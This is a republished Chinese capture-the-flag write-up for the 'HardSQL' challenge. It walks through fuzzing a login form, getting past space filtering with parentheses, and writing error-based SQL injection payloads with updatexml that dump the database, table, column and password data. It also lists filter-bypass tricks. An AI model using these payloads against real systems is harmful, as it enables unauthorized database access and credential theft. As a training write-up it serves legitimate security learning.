当前位置:主页 > 查看内容

[极客大挑战 2019]HardSQL

发布时间:2021-07-29 00:00| 位朋友查看

简介:[极客大挑战 2019]HardSQL 主要记录一下自己做题的思路 题目 打开环境得到 废话不多说都说了是hardsql了直接fuzz测试一下 可以看到有很多还是没被过滤的现在就要自己再手动测试一下常见的一些方式了我这里说下我做这题的思路 先试着输入了 admin # 返回了 说……

[极客大挑战 2019]HardSQL
(主要记录一下自己做题的思路)
题目:
打开环境,得到:
在这里插入图片描述
废话不多说,都说了是hardsql了,直接fuzz测试一下
在这里插入图片描述
可以看到有很多还是没被过滤的,现在就要自己再手动测试一下常见的一些方式了,我这里说下我做这题的思路:
先试着输入了admin' #,返回了:
在这里插入图片描述
说明空格确实被过滤,接着就要想办法绕过空格了,先试着用了下/**/来绕过空格,发现同样被过滤了
在这里插入图片描述
现在只有用()括号来绕过空格了,这里简单讲下空格绕过的原理:

括号是来包含子查询的,任何可以计算出结果的语句都可以用括号围起来,而括号的两端,可以没有多余的空格

试着输入:
在这里插入图片描述
发现没有出现那几个汉子,证明绕过了空格
现在仔细观察那个error界面,猜测应该是报错注入,先试试用updatexml注入看:

admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

可以拿到数据库:
在这里插入图片描述
继续查表名,构造payload:

admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#

直接拿到了表名:
在这里插入图片描述
继续查列名,payload为:

admin'or(updatexml(1,concat(0x7e,(select(column_name)from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

然后得到:
在这里插入图片描述
所以再改进一点payload为:

admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

可以拿到列名:
在这里插入图片描述
继续构造payload:

admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,'~',username,'~',password))from(H4rDsq1)),0x7e),1))#

可以拿到一半的flag
在这里插入图片描述
然后这里就要补充一点知识了,也可以对上面的payload构造有点理解

1:空格被过滤可以使用/**/或者()绕过
2:=号被过滤可以用like来绕过
3:substring与mid被过滤可以用right与left来绕过

所以这里如果要得到右边的flag的话,就要用right来构造了,直接看构造好的payload:

admin'or(updatexml(1,concat(0x7e,(select(right(password,35))from(H4rDsq1)),0x7e),1))#

最终拿到右边的flag:
在这里插入图片描述
去掉重复的,拼接上就可以了

;原文链接:https://blog.csdn.net/qq_51652864/article/details/115740086
本站部分内容转载于网络,版权归原作者所有,转载之目的在于传播更多优秀技术内容,如有侵权请联系QQ/微信:153890879删除,谢谢!
上一篇:hashMap的扩容原理 下一篇:没有了

推荐图文


随机推荐